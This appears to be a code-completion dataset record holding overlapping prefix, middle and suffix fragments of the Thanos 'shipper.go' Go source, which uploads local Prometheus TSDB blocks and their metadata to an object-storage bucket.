continue
}
// We only ship of the first compacted block level as normal flow.
if m.Compaction.Level > 1 {
if !uploadCompacted {
continue
}
}
// Check against bucket if the meta file for this block exists.
ok, err := s.bucket.Exists(ctx, path.Join(m.ULID.String(), block.MetaFilename))
if err != nil {
return 0, errors.Wrap(err, "check exists")
}
if ok {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
// Skip overlap check if out of order uploads is enabled.
if m.Compaction.Level > 1 && !s.allowOutOfOrderUploads {
if err := checker.IsOverlapping(ctx, m.BlockMeta); err != nil {
return 0, errors.Errorf("Found overlap or error during sync, cannot upload compacted block, details: %v", err)
}
}
if err := s.upload(ctx, m); err != nil {
if !s.allowOutOfOrderUploads {
return 0, errors.Wrapf(err, "upload %v", m.ULID)
}
// No error returned, just log line. This is because we want other blocks to be uploaded even
// though this one failed. It will be retried on second Sync iteration.
level.Error(s.logger).Log("msg", "shipping failed", "block", m.ULID, "err", err)
uploadErrs++
continue
}
meta.Uploaded = append(meta.Uploaded, m.ULID)
uploaded++
s.metrics.uploads.Inc()
}
if err := WriteMetaFile(s.logger, s.dir, meta); err != nil {
level.Warn(s.logger).Log("msg", "updating meta file failed", "err", err)
}
s.metrics.dirSyncs.Inc()
if uploadErrs > 0 {
s.metrics.uploadFailures.Add(float64(uploadErrs))
return uploaded, errors.Errorf("failed to sync %v blocks", uploadErrs)
}
if uploadCompacted {
s.metrics.uploadedCompacted.Set(1)
} else {
s.metrics.uploadedCompacted.Set(0)
}
return uploaded, nil
}
// sync uploads the block if not exists in remote storage.
// TODO(khyatisoneji): Double check if block does not have deletion-mark.json for some reason, otherwise log it or return error.
func (s *Shipper) upload(ctx context.Context, meta *metadata.Meta) error {
level.Info(s.logger).Log("msg", "upload new block", "id", meta.ULID)
// We hard-link the files into a temporary upload directory so we are not affected
// by other operations happening against the TSDB directory.
updir := filepath.Join(s.dir, "thanos", "upload", meta.ULID.String())
// Remove updir just in case.
if err := os.RemoveAll(updir); err != nil {
return errors.Wrap(err, "clean upload directory")
}
if err := os.MkdirAll(updir, 0750); err != nil {
return errors.Wrap(err, "create upload dir")
}
defer func() {
if err := os.RemoveAll(updir); err != nil {
level.Error(s.logger).Log("msg", "failed to clean upload directory", "err", err)
}
}()
dir := filepath.Join(s.dir, meta.ULID.String())
if err := hardlinkBlock(dir, updir); err != nil {
return errors.Wrap(err, "hard link block")
}
// Attach current labels and write a new meta file with Thanos extensions.
if lset := s.getLabels(); lset != nil {
meta.Thanos.Labels = lset.Map()
}
meta.Thanos.Source = s.source
meta.Thanos.SegmentFiles = block.GetSegmentFiles(updir)
if err := meta.WriteToDir(s.logger, updir); err != nil {
return errors.Wrap(err, "write meta file")
}
return block.Upload(ctx, s.logger, s.bucket, updir, s.hashFunc)
}
// blockMetasFromOldest returns the block meta of each block found in dir
// sorted by minTime asc.
func (s *Shipper) blockMetasFromOldest() (metas []*metadata.Meta, _ error) {
fis, err := os.ReadDir(s.dir)
if err != nil {
return nil, errors.Wrap(err, "read dir")
}
names := make([]string, 0, len(fis))
for _, fi := range fis {
names = append(names, fi.Name())
}
for _, n := range names {
if _, ok := block.IsBlockDir(n); !ok {
continue
}
dir := filepath.Join(s.dir, n)
fi, err := os.Stat(dir)
if err != nil {
return nil, errors.Wrapf(err, "stat block %v", dir)
}
if !fi.IsDir() {
continue
}
m, err := metadata.ReadFromDir(dir)
if err != nil {
return nil, errors.Wrapf(err, "read metadata for block %v", dir)
}
metas = append(metas, m)
}
sort.Slice(metas, func(i, j int) bool {
return metas[i].BlockMeta.MinTime < metas[j].BlockMeta.MinTime
})
return metas, nil
}
func hardlinkBlock(src, dst string) error {
chunkDir := filepath.Join(dst, block.ChunksDirname)
if err := os.MkdirAll(chunkDir, 0750); err != nil {
return errors.Wrap(err, "create chunks dir")
}
fis, err := os.ReadDir(filepath.Join(src, block.ChunksDirname))
if err != nil {
return errors.Wrap(err, "read chunk dir")
}
files := make([]string, 0, len(fis))
for _, fi := range fis {
files = append(files, fi.Name())
}
for i, fn := range files {
files[i] = filepath.Join(block.ChunksDirname, fn)
}
files = append(files, block.MetaFilename, block.IndexFilename)
for _, fn := range files {
if err := os.Link(filepath.Join(src, fn), filepath.Join(dst, fn)); err != nil {
return errors.Wrapf(err, "hard link file %s", fn)
}
}
return nil
}
// Meta defines the format thanos.shipper.json file that the shipper places in the data directory.
type Meta struct {
Version int `json:"version"`
Uploaded []ulid.ULID `json:"uploaded"`
}
const (
// MetaFilename is the known JSON filename for meta information.
MetaFilename = "thanos.shipper.json"
// MetaVersion1 represents 1 version of meta.
MetaVersion1 = 1
)
// WriteMetaFile writes the given meta into <dir>/thanos.shipper.json.
func WriteMetaFile(logger log.Logger, dir string, meta *Meta) error |
// ReadMetaFile reads the given meta from <dir>/thanos.shipper.json.
func ReadMetaFile(dir string) (*Meta, error) {
fpath := filepath.Join(dir, filepath.Clean(MetaFilename))
b, err := os.ReadFile(fpath)
if err != nil {
return nil, errors.Wrapf(err, "failed to read %s", fpath)
}
var m Meta
if err := json.Unmarshal(b, &m); err != nil {
return nil, errors.Wrapf(err, "failed to parse %s as JSON: %q", fpath, string(b))
}
if m.Version != MetaVersion1 {
return nil, errors.Errorf("unexpected meta file version %d", m.Version)
}
return &m, nil
}
func renameFile(logger log.Logger, from, to string) error {
if err := os.RemoveAll(to); err != nil {
return err
}
if err := os.Rename(from, to); err != nil {
return err
}
// Directory was renamed; sync parent dir to persist rename.
pdir, err := fileutil.OpenDir(filepath.Dir(to))
if err != nil {
return err
}
if err = fileutil.Fdatasync(pdir); err != nil {
runutil.CloseWithLogOnErr(logger, pdir, "rename file dir close")
return err
}
return pdir.Close()
}
| {
// Make any changes to the file appear atomic.
path := filepath.Join(dir, MetaFilename)
tmp := path + ".tmp"
f, err := os.Create(tmp)
if err != nil {
return err
}
enc := json.NewEncoder(f)
enc.SetIndent("", "\t")
if err := enc.Encode(meta); err != nil {
runutil.CloseWithLogOnErr(logger, f, "write meta file close")
return err
}
if err := f.Close(); err != nil {
return err
}
return renameFile(logger, tmp, path)
} | identifier_body |
shipper.go | // Copyright (c) The Thanos Authors.
// Licensed under the Apache License 2.0.
// Package shipper detects directories on the local file system and uploads
// them to a block storage.
package shipper
import (
"context"
"encoding/json"
"math"
"os"
"path"
"path/filepath"
"sort"
"sync"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/oklog/ulid"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
"github.com/prometheus/prometheus/model/labels"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/fileutil"
"github.com/thanos-io/objstore"
"github.com/thanos-io/thanos/pkg/block"
"github.com/thanos-io/thanos/pkg/block/metadata"
"github.com/thanos-io/thanos/pkg/runutil"
)
type metrics struct {
dirSyncs prometheus.Counter
dirSyncFailures prometheus.Counter
uploads prometheus.Counter
uploadFailures prometheus.Counter
uploadedCompacted prometheus.Gauge
}
func newMetrics(reg prometheus.Registerer) *metrics {
var m metrics
m.dirSyncs = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_syncs_total",
Help: "Total number of dir syncs",
})
m.dirSyncFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_sync_failures_total",
Help: "Total number of failed dir syncs",
})
m.uploads = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_uploads_total",
Help: "Total number of uploaded blocks",
})
m.uploadFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_upload_failures_total",
Help: "Total number of block upload failures",
})
m.uploadedCompacted = promauto.With(reg).NewGauge(prometheus.GaugeOpts{
Name: "thanos_shipper_upload_compacted_done",
Help: "If 1 it means shipper uploaded all compacted blocks from the filesystem.",
})
return &m
}
// Shipper watches a directory for matching files and directories and uploads
// them to a remote data store.
type Shipper struct {
logger log.Logger
dir string
metrics *metrics
bucket objstore.Bucket
source metadata.SourceType
uploadCompactedFunc func() bool
allowOutOfOrderUploads bool
hashFunc metadata.HashFunc
labels func() labels.Labels
mtx sync.RWMutex
}
// New creates a new shipper that detects new TSDB blocks in dir and uploads them to
// remote if necessary. It attaches the Thanos metadata section in each meta JSON file.
// If uploadCompacted is enabled, it also uploads compacted blocks which are already in filesystem.
func New(
logger log.Logger,
r prometheus.Registerer,
dir string,
bucket objstore.Bucket,
lbls func() labels.Labels,
source metadata.SourceType,
uploadCompactedFunc func() bool,
allowOutOfOrderUploads bool,
hashFunc metadata.HashFunc,
) *Shipper {
if logger == nil {
logger = log.NewNopLogger()
}
if lbls == nil {
lbls = func() labels.Labels { return nil }
}
if uploadCompactedFunc == nil {
uploadCompactedFunc = func() bool {
return false
}
}
return &Shipper{
logger: logger,
dir: dir,
bucket: bucket,
labels: lbls,
metrics: newMetrics(r),
source: source,
allowOutOfOrderUploads: allowOutOfOrderUploads,
uploadCompactedFunc: uploadCompactedFunc,
hashFunc: hashFunc,
}
}
func (s *Shipper) SetLabels(lbls labels.Labels) {
s.mtx.Lock()
defer s.mtx.Unlock()
s.labels = func() labels.Labels { return lbls }
}
func (s *Shipper) getLabels() labels.Labels {
s.mtx.RLock()
defer s.mtx.RUnlock()
return s.labels()
}
// Timestamps returns the minimum timestamp for which data is available and the highest timestamp
// of blocks that were successfully uploaded.
func (s *Shipper) Timestamps() (minTime, maxSyncTime int64, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
return 0, 0, errors.Wrap(err, "read shipper meta file")
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
minTime = math.MaxInt64
maxSyncTime = math.MinInt64
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, 0, err
}
for _, m := range metas {
if m.MinTime < minTime {
minTime = m.MinTime
}
if _, ok := hasUploaded[m.ULID]; ok && m.MaxTime > maxSyncTime {
maxSyncTime = m.MaxTime
}
}
if minTime == math.MaxInt64 {
// No block yet found. We cannot assume any min block size so propagate 0 minTime.
minTime = 0
}
return minTime, maxSyncTime, nil
}
type lazyOverlapChecker struct {
synced bool
logger log.Logger
bucket objstore.Bucket
labels func() labels.Labels
metas []tsdb.BlockMeta
lookupMetas map[ulid.ULID]struct{}
}
func newLazyOverlapChecker(logger log.Logger, bucket objstore.Bucket, labels func() labels.Labels) *lazyOverlapChecker {
return &lazyOverlapChecker{
logger: logger,
bucket: bucket,
labels: labels,
lookupMetas: map[ulid.ULID]struct{}{},
}
}
func (c *lazyOverlapChecker) sync(ctx context.Context) error {
if err := c.bucket.Iter(ctx, "", func(path string) error {
id, ok := block.IsBlockDir(path)
if !ok {
return nil
}
m, err := block.DownloadMeta(ctx, c.logger, c.bucket, id)
if err != nil {
return err
}
if !labels.Equal(labels.FromMap(m.Thanos.Labels), c.labels()) {
return nil
}
c.metas = append(c.metas, m.BlockMeta)
c.lookupMetas[m.ULID] = struct{}{}
return nil
}); err != nil {
return errors.Wrap(err, "get all block meta.")
}
c.synced = true
return nil
}
func (c *lazyOverlapChecker) IsOverlapping(ctx context.Context, newMeta tsdb.BlockMeta) error {
if !c.synced {
level.Info(c.logger).Log("msg", "gathering all existing blocks from the remote bucket for check", "id", newMeta.ULID.String())
if err := c.sync(ctx); err != nil {
return err
}
}
// TODO(bwplotka) so confusing! we need to sort it first. Add comment to TSDB code.
metas := append([]tsdb.BlockMeta{newMeta}, c.metas...)
sort.Slice(metas, func(i, j int) bool {
return metas[i].MinTime < metas[j].MinTime
})
if o := tsdb.OverlappingBlocks(metas); len(o) > 0 {
// TODO(bwplotka): Consider checking if overlaps relates to block in concern?
return errors.Errorf("shipping compacted block %s is blocked; overlap spotted: %s", newMeta.ULID, o.String())
}
return nil
}
// Sync performs a single synchronization, which ensures all non-compacted local blocks have been uploaded
// to the object bucket once.
//
// If uploaded.
//
// It is not concurrency-safe, however it is compactor-safe (running concurrently with compactor is ok).
func (s *Shipper) Sync(ctx context.Context) (uploaded int, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
// If we encounter any error, proceed with an empty meta file and overwrite it later.
// The meta file is only used to avoid unnecessary bucket.Exists call,
// which are properly handled by the system if their occur anyway.
if !os.IsNotExist(err) {
level.Warn(s.logger).Log("msg", "reading meta file failed, will override it", "err", err)
}
meta = &Meta{Version: MetaVersion1}
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
// Reset the uploaded slice so we can rebuild it only with blocks that still exist locally.
meta.Uploaded = nil
var (
checker = newLazyOverlapChecker(s.logger, s.bucket, s.getLabels)
uploadErrs int
)
uploadCompacted := s.uploadCompactedFunc()
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, err
}
for _, m := range metas {
// Do not sync a block if we already uploaded or ignored it. If it's no longer found in the bucket,
// it was generally removed by the compaction process.
if _, uploaded := hasUploaded[m.ULID]; uploaded {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
if m.Stats.NumSamples == 0 {
// Ignore empty blocks.
level.Debug(s.logger).Log("msg", "ignoring empty block", "block", m.ULID)
continue
}
// We only ship of the first compacted block level as normal flow.
if m.Compaction.Level > 1 {
if !uploadCompacted {
continue
}
}
// Check against bucket if the meta file for this block exists.
ok, err := s.bucket.Exists(ctx, path.Join(m.ULID.String(), block.MetaFilename))
if err != nil {
return 0, errors.Wrap(err, "check exists")
}
if ok {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
// Skip overlap check if out of order uploads is enabled.
if m.Compaction.Level > 1 && !s.allowOutOfOrderUploads {
if err := checker.IsOverlapping(ctx, m.BlockMeta); err != nil {
return 0, errors.Errorf("Found overlap or error during sync, cannot upload compacted block, details: %v", err)
}
}
if err := s.upload(ctx, m); err != nil {
if !s.allowOutOfOrderUploads {
return 0, errors.Wrapf(err, "upload %v", m.ULID)
}
// No error returned, just log line. This is because we want other blocks to be uploaded even
// though this one failed. It will be retried on second Sync iteration.
level.Error(s.logger).Log("msg", "shipping failed", "block", m.ULID, "err", err)
uploadErrs++
continue
}
meta.Uploaded = append(meta.Uploaded, m.ULID)
uploaded++
s.metrics.uploads.Inc()
}
if err := WriteMetaFile(s.logger, s.dir, meta); err != nil {
level.Warn(s.logger).Log("msg", "updating meta file failed", "err", err)
}
s.metrics.dirSyncs.Inc()
if uploadErrs > 0 {
s.metrics.uploadFailures.Add(float64(uploadErrs))
return uploaded, errors.Errorf("failed to sync %v blocks", uploadErrs)
}
if uploadCompacted {
s.metrics.uploadedCompacted.Set(1)
} else {
s.metrics.uploadedCompacted.Set(0)
}
return uploaded, nil
}
// sync uploads the block if not exists in remote storage.
// TODO(khyatisoneji): Double check if block does not have deletion-mark.json for some reason, otherwise log it or return error.
func (s *Shipper) upload(ctx context.Context, meta *metadata.Meta) error {
level.Info(s.logger).Log("msg", "upload new block", "id", meta.ULID)
// We hard-link the files into a temporary upload directory so we are not affected
// by other operations happening against the TSDB directory.
updir := filepath.Join(s.dir, "thanos", "upload", meta.ULID.String())
// Remove updir just in case.
if err := os.RemoveAll(updir); err != nil {
return errors.Wrap(err, "clean upload directory")
}
if err := os.MkdirAll(updir, 0750); err != nil {
return errors.Wrap(err, "create upload dir")
}
defer func() {
if err := os.RemoveAll(updir); err != nil {
level.Error(s.logger).Log("msg", "failed to clean upload directory", "err", err)
}
}()
dir := filepath.Join(s.dir, meta.ULID.String())
if err := hardlinkBlock(dir, updir); err != nil {
return errors.Wrap(err, "hard link block")
}
// Attach current labels and write a new meta file with Thanos extensions.
if lset := s.getLabels(); lset != nil {
meta.Thanos.Labels = lset.Map()
}
meta.Thanos.Source = s.source
meta.Thanos.SegmentFiles = block.GetSegmentFiles(updir)
if err := meta.WriteToDir(s.logger, updir); err != nil {
return errors.Wrap(err, "write meta file")
}
return block.Upload(ctx, s.logger, s.bucket, updir, s.hashFunc)
}
// blockMetasFromOldest returns the block meta of each block found in dir
// sorted by minTime asc.
func (s *Shipper) blockMetasFromOldest() (metas []*metadata.Meta, _ error) {
fis, err := os.ReadDir(s.dir)
if err != nil {
return nil, errors.Wrap(err, "read dir")
}
names := make([]string, 0, len(fis))
for _, fi := range fis {
names = append(names, fi.Name())
}
for _, n := range names {
if _, ok := block.IsBlockDir(n); !ok {
continue
}
dir := filepath.Join(s.dir, n)
fi, err := os.Stat(dir)
if err != nil {
return nil, errors.Wrapf(err, "stat block %v", dir)
}
if !fi.IsDir() {
continue
}
m, err := metadata.ReadFromDir(dir)
if err != nil {
return nil, errors.Wrapf(err, "read metadata for block %v", dir)
}
metas = append(metas, m)
}
sort.Slice(metas, func(i, j int) bool {
return metas[i].BlockMeta.MinTime < metas[j].BlockMeta.MinTime
})
return metas, nil
}
func hardlinkBlock(src, dst string) error {
chunkDir := filepath.Join(dst, block.ChunksDirname)
if err := os.MkdirAll(chunkDir, 0750); err != nil {
return errors.Wrap(err, "create chunks dir")
}
fis, err := os.ReadDir(filepath.Join(src, block.ChunksDirname))
if err != nil {
return errors.Wrap(err, "read chunk dir")
}
files := make([]string, 0, len(fis))
for _, fi := range fis {
files = append(files, fi.Name())
}
for i, fn := range files {
files[i] = filepath.Join(block.ChunksDirname, fn)
}
files = append(files, block.MetaFilename, block.IndexFilename)
for _, fn := range files {
if err := os.Link(filepath.Join(src, fn), filepath.Join(dst, fn)); err != nil {
return errors.Wrapf(err, "hard link file %s", fn)
}
} | return nil
}
// Meta defines the format thanos.shipper.json file that the shipper places in the data directory.
type Meta struct {
Version int `json:"version"`
Uploaded []ulid.ULID `json:"uploaded"`
}
const (
// MetaFilename is the known JSON filename for meta information.
MetaFilename = "thanos.shipper.json"
// MetaVersion1 represents 1 version of meta.
MetaVersion1 = 1
)
// WriteMetaFile writes the given meta into <dir>/thanos.shipper.json.
func WriteMetaFile(logger log.Logger, dir string, meta *Meta) error {
// Make any changes to the file appear atomic.
path := filepath.Join(dir, MetaFilename)
tmp := path + ".tmp"
f, err := os.Create(tmp)
if err != nil {
return err
}
enc := json.NewEncoder(f)
enc.SetIndent("", "\t")
if err := enc.Encode(meta); err != nil {
runutil.CloseWithLogOnErr(logger, f, "write meta file close")
return err
}
if err := f.Close(); err != nil {
return err
}
return renameFile(logger, tmp, path)
}
// ReadMetaFile reads the given meta from <dir>/thanos.shipper.json.
func ReadMetaFile(dir string) (*Meta, error) {
fpath := filepath.Join(dir, filepath.Clean(MetaFilename))
b, err := os.ReadFile(fpath)
if err != nil {
return nil, errors.Wrapf(err, "failed to read %s", fpath)
}
var m Meta
if err := json.Unmarshal(b, &m); err != nil {
return nil, errors.Wrapf(err, "failed to parse %s as JSON: %q", fpath, string(b))
}
if m.Version != MetaVersion1 {
return nil, errors.Errorf("unexpected meta file version %d", m.Version)
}
return &m, nil
}
func renameFile(logger log.Logger, from, to string) error {
if err := os.RemoveAll(to); err != nil {
return err
}
if err := os.Rename(from, to); err != nil {
return err
}
// Directory was renamed; sync parent dir to persist rename.
pdir, err := fileutil.OpenDir(filepath.Dir(to))
if err != nil {
return err
}
if err = fileutil.Fdatasync(pdir); err != nil {
runutil.CloseWithLogOnErr(logger, pdir, "rename file dir close")
return err
}
return pdir.Close()
} | random_line_split |
|
shipper.go | // Copyright (c) The Thanos Authors.
// Licensed under the Apache License 2.0.
// Package shipper detects directories on the local file system and uploads
// them to a block storage.
package shipper
import (
"context"
"encoding/json"
"math"
"os"
"path"
"path/filepath"
"sort"
"sync"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/oklog/ulid"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
"github.com/prometheus/prometheus/model/labels"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/fileutil"
"github.com/thanos-io/objstore"
"github.com/thanos-io/thanos/pkg/block"
"github.com/thanos-io/thanos/pkg/block/metadata"
"github.com/thanos-io/thanos/pkg/runutil"
)
type metrics struct {
dirSyncs prometheus.Counter
dirSyncFailures prometheus.Counter
uploads prometheus.Counter
uploadFailures prometheus.Counter
uploadedCompacted prometheus.Gauge
}
func newMetrics(reg prometheus.Registerer) *metrics {
var m metrics
m.dirSyncs = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_syncs_total",
Help: "Total number of dir syncs",
})
m.dirSyncFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_sync_failures_total",
Help: "Total number of failed dir syncs",
})
m.uploads = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_uploads_total",
Help: "Total number of uploaded blocks",
})
m.uploadFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_upload_failures_total",
Help: "Total number of block upload failures",
})
m.uploadedCompacted = promauto.With(reg).NewGauge(prometheus.GaugeOpts{
Name: "thanos_shipper_upload_compacted_done",
Help: "If 1 it means shipper uploaded all compacted blocks from the filesystem.",
})
return &m
}
// Shipper watches a directory for matching files and directories and uploads
// them to a remote data store.
type Shipper struct {
logger log.Logger
dir string
metrics *metrics
bucket objstore.Bucket
source metadata.SourceType
uploadCompactedFunc func() bool
allowOutOfOrderUploads bool
hashFunc metadata.HashFunc
labels func() labels.Labels
mtx sync.RWMutex
}
// New creates a new shipper that detects new TSDB blocks in dir and uploads them to
// remote if necessary. It attaches the Thanos metadata section in each meta JSON file.
// If uploadCompacted is enabled, it also uploads compacted blocks which are already in filesystem.
func New(
logger log.Logger,
r prometheus.Registerer,
dir string,
bucket objstore.Bucket,
lbls func() labels.Labels,
source metadata.SourceType,
uploadCompactedFunc func() bool,
allowOutOfOrderUploads bool,
hashFunc metadata.HashFunc,
) *Shipper {
if logger == nil {
logger = log.NewNopLogger()
}
if lbls == nil {
lbls = func() labels.Labels { return nil }
}
if uploadCompactedFunc == nil {
uploadCompactedFunc = func() bool {
return false
}
}
return &Shipper{
logger: logger,
dir: dir,
bucket: bucket,
labels: lbls,
metrics: newMetrics(r),
source: source,
allowOutOfOrderUploads: allowOutOfOrderUploads,
uploadCompactedFunc: uploadCompactedFunc,
hashFunc: hashFunc,
}
}
func (s *Shipper) SetLabels(lbls labels.Labels) {
s.mtx.Lock()
defer s.mtx.Unlock()
s.labels = func() labels.Labels { return lbls }
}
func (s *Shipper) getLabels() labels.Labels {
s.mtx.RLock()
defer s.mtx.RUnlock()
return s.labels()
}
// Timestamps returns the minimum timestamp for which data is available and the highest timestamp
// of blocks that were successfully uploaded.
func (s *Shipper) Timestamps() (minTime, maxSyncTime int64, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
return 0, 0, errors.Wrap(err, "read shipper meta file")
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
minTime = math.MaxInt64
maxSyncTime = math.MinInt64
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, 0, err
}
for _, m := range metas {
if m.MinTime < minTime {
minTime = m.MinTime
}
if _, ok := hasUploaded[m.ULID]; ok && m.MaxTime > maxSyncTime {
maxSyncTime = m.MaxTime
}
}
if minTime == math.MaxInt64 {
// No block yet found. We cannot assume any min block size so propagate 0 minTime.
minTime = 0
}
return minTime, maxSyncTime, nil
}
type lazyOverlapChecker struct {
synced bool
logger log.Logger
bucket objstore.Bucket
labels func() labels.Labels
metas []tsdb.BlockMeta
lookupMetas map[ulid.ULID]struct{}
}
func newLazyOverlapChecker(logger log.Logger, bucket objstore.Bucket, labels func() labels.Labels) *lazyOverlapChecker {
return &lazyOverlapChecker{
logger: logger,
bucket: bucket,
labels: labels,
lookupMetas: map[ulid.ULID]struct{}{},
}
}
func (c *lazyOverlapChecker) sync(ctx context.Context) error {
if err := c.bucket.Iter(ctx, "", func(path string) error {
id, ok := block.IsBlockDir(path)
if !ok {
return nil
}
m, err := block.DownloadMeta(ctx, c.logger, c.bucket, id)
if err != nil {
return err
}
if !labels.Equal(labels.FromMap(m.Thanos.Labels), c.labels()) {
return nil
}
c.metas = append(c.metas, m.BlockMeta)
c.lookupMetas[m.ULID] = struct{}{}
return nil
}); err != nil {
return errors.Wrap(err, "get all block meta.")
}
c.synced = true
return nil
}
func (c *lazyOverlapChecker) IsOverlapping(ctx context.Context, newMeta tsdb.BlockMeta) error {
if !c.synced {
level.Info(c.logger).Log("msg", "gathering all existing blocks from the remote bucket for check", "id", newMeta.ULID.String())
if err := c.sync(ctx); err != nil {
return err
}
}
// TODO(bwplotka) so confusing! we need to sort it first. Add comment to TSDB code.
metas := append([]tsdb.BlockMeta{newMeta}, c.metas...)
sort.Slice(metas, func(i, j int) bool {
return metas[i].MinTime < metas[j].MinTime
})
if o := tsdb.OverlappingBlocks(metas); len(o) > 0 {
// TODO(bwplotka): Consider checking if overlaps relates to block in concern?
return errors.Errorf("shipping compacted block %s is blocked; overlap spotted: %s", newMeta.ULID, o.String())
}
return nil
}
// Sync performs a single synchronization, which ensures all non-compacted local blocks have been uploaded
// to the object bucket once.
//
// If uploaded.
//
// It is not concurrency-safe, however it is compactor-safe (running concurrently with compactor is ok).
func (s *Shipper) Sync(ctx context.Context) (uploaded int, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
// If we encounter any error, proceed with an empty meta file and overwrite it later.
// The meta file is only used to avoid unnecessary bucket.Exists call,
// which are properly handled by the system if their occur anyway.
if !os.IsNotExist(err) {
level.Warn(s.logger).Log("msg", "reading meta file failed, will override it", "err", err)
}
meta = &Meta{Version: MetaVersion1}
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
// Reset the uploaded slice so we can rebuild it only with blocks that still exist locally.
meta.Uploaded = nil
var (
checker = newLazyOverlapChecker(s.logger, s.bucket, s.getLabels)
uploadErrs int
)
uploadCompacted := s.uploadCompactedFunc()
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, err
}
for _, m := range metas {
// Do not sync a block if we already uploaded or ignored it. If it's no longer found in the bucket,
// it was generally removed by the compaction process.
if _, uploaded := hasUploaded[m.ULID]; uploaded {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
if m.Stats.NumSamples == 0 {
// Ignore empty blocks.
level.Debug(s.logger).Log("msg", "ignoring empty block", "block", m.ULID)
continue
}
// We only ship of the first compacted block level as normal flow.
if m.Compaction.Level > 1 {
if !uploadCompacted {
continue
}
}
// Check against bucket if the meta file for this block exists.
ok, err := s.bucket.Exists(ctx, path.Join(m.ULID.String(), block.MetaFilename))
if err != nil {
return 0, errors.Wrap(err, "check exists")
}
if ok {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
// Skip overlap check if out of order uploads is enabled.
if m.Compaction.Level > 1 && !s.allowOutOfOrderUploads {
if err := checker.IsOverlapping(ctx, m.BlockMeta); err != nil {
return 0, errors.Errorf("Found overlap or error during sync, cannot upload compacted block, details: %v", err)
}
}
if err := s.upload(ctx, m); err != nil {
if !s.allowOutOfOrderUploads |
// No error returned, just log line. This is because we want other blocks to be uploaded even
// though this one failed. It will be retried on second Sync iteration.
level.Error(s.logger).Log("msg", "shipping failed", "block", m.ULID, "err", err)
uploadErrs++
continue
}
meta.Uploaded = append(meta.Uploaded, m.ULID)
uploaded++
s.metrics.uploads.Inc()
}
if err := WriteMetaFile(s.logger, s.dir, meta); err != nil {
level.Warn(s.logger).Log("msg", "updating meta file failed", "err", err)
}
s.metrics.dirSyncs.Inc()
if uploadErrs > 0 {
s.metrics.uploadFailures.Add(float64(uploadErrs))
return uploaded, errors.Errorf("failed to sync %v blocks", uploadErrs)
}
if uploadCompacted {
s.metrics.uploadedCompacted.Set(1)
} else {
s.metrics.uploadedCompacted.Set(0)
}
return uploaded, nil
}
// sync uploads the block if not exists in remote storage.
// TODO(khyatisoneji): Double check if block does not have deletion-mark.json for some reason, otherwise log it or return error.
func (s *Shipper) upload(ctx context.Context, meta *metadata.Meta) error {
level.Info(s.logger).Log("msg", "upload new block", "id", meta.ULID)
// We hard-link the files into a temporary upload directory so we are not affected
// by other operations happening against the TSDB directory.
updir := filepath.Join(s.dir, "thanos", "upload", meta.ULID.String())
// Remove updir just in case.
if err := os.RemoveAll(updir); err != nil {
return errors.Wrap(err, "clean upload directory")
}
if err := os.MkdirAll(updir, 0750); err != nil {
return errors.Wrap(err, "create upload dir")
}
defer func() {
if err := os.RemoveAll(updir); err != nil {
level.Error(s.logger).Log("msg", "failed to clean upload directory", "err", err)
}
}()
dir := filepath.Join(s.dir, meta.ULID.String())
if err := hardlinkBlock(dir, updir); err != nil {
return errors.Wrap(err, "hard link block")
}
// Attach current labels and write a new meta file with Thanos extensions.
if lset := s.getLabels(); lset != nil {
meta.Thanos.Labels = lset.Map()
}
meta.Thanos.Source = s.source
meta.Thanos.SegmentFiles = block.GetSegmentFiles(updir)
if err := meta.WriteToDir(s.logger, updir); err != nil {
return errors.Wrap(err, "write meta file")
}
return block.Upload(ctx, s.logger, s.bucket, updir, s.hashFunc)
}
// blockMetasFromOldest returns the block meta of each block found in dir
// sorted by minTime asc.
func (s *Shipper) blockMetasFromOldest() (metas []*metadata.Meta, _ error) {
fis, err := os.ReadDir(s.dir)
if err != nil {
return nil, errors.Wrap(err, "read dir")
}
names := make([]string, 0, len(fis))
for _, fi := range fis {
names = append(names, fi.Name())
}
for _, n := range names {
if _, ok := block.IsBlockDir(n); !ok {
continue
}
